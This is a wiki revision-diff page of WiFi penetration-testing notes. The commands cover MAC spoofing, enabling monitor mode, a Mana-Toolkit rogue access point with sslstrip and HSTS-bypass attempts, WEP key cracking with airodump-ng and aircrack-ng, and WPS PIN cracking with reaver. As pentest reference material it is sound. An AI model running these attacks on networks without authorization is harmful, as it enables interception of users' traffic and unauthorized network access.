Wiki

Wifi: Penetration Testing: Difference between revisions

Kangtain (talk | contribs)
Bureaucrats, Interface administrators, Suppressors, Administrators
9,154 edits
VisualWikitext
Created page with "== Change MAC adress == <syntaxhighlight lang="bash"> > ifconfig wlan0 down > macchanger —random wlan0 > ifconfig wlan0 up </syntaxhighlight>Wifi card default mode is “managed mode” only capture data packets that contains it’s MAC address. In <code>monitor mode</code> it captures every data packet in it’s wifi range == Enable monitor mode == <syntaxhighlight lang="bash"> > ifconfig wlan0 down > airmon-ng start wlan0 ##( Some times it does not work) || OR use..."
 
 
(One intermediate revision by the same user not shown)
Line 85: Line 85:
# start-nat-simple: starts a regular AP using internet connection in upstream interface.
# start-nat-simple: starts a regular AP using internet connection in upstream interface.
# start-nat-full: starts AP with internet connection, it also starts sslstrip, sslsplit, firelamp and attempts to bypass HTST. <kbd>''<nowiki>{{Sometimes this script is not working}}</nowiki>''</kbd>
# start-nat-full: starts AP with internet connection, it also starts sslstrip, sslsplit, firelamp and attempts to bypass HTST. <kbd>''<nowiki>{{Sometimes this script is not working}}</nowiki>''</kbd>
<syntaxhighlight lang="bash">
## install Mana-Toolkit
> apt-get install mana-toolkit


## install Mana-Toolkit
## Modify configuration files
> apt-get install mana-toolkit
> vim /etc/mana-toolkit/hostapd-karma.conf
> vim /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
## Modify configuration files
 
> vim /etc/mana-toolkit/hostapd-karma.conf
# run the script
> vim /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
> bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh
</syntaxhighlight>
# run the script
> bash /usr/share/mana-toolkit/run-mana/start-nat-simple.sh


== WEP Cracking ==
== WEP Cracking ==
Line 106: Line 107:


=== Simple WEP cracking (In case of a busy network with active users and high IV rate) ===
=== Simple WEP cracking (In case of a busy network with active users and high IV rate) ===
## Run airodump-ng to log all traffic from the target network
<syntaxhighlight lang="bash">
## airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
## Run airodump-ng to log all traffic from the target network
> airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
## airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
> airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out mon0
## At the same time we shall use aircrack-ng to try and crack the capture file created by the above command
 
> aircrack-ng out-01.cap
## At the same time we shall use aircrack-ng to try and crack the capture file created by the above command
> aircrack-ng out-01.cap
## Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IVs in out-01.cap is enough.
 
## Keep both programs running at the same time and aircrack-ng will be able to determine the key when the number of IVs in out-01.cap is enough.
</syntaxhighlight>


=== Packet Injection ===
=== Packet Injection ===
Line 169: Line 172:
  ## Start Cracking WPS pin with reaver
  ## Start Cracking WPS pin with reaver
  > reaver -b [target MAC] -c [channel] -i mon0
  > reaver -b [target MAC] -c [channel] -i mon0
== Source ==
* [https://github.com/wwong99/pentest-notes/blob/master/wifi/wifi_penetration_testing.md github.com]
[[Category:Security]]
[[Category:Wifi]]
Retrieved from "https://kangtain.com/wiki/index.php/Wifi:_Penetration_Testing"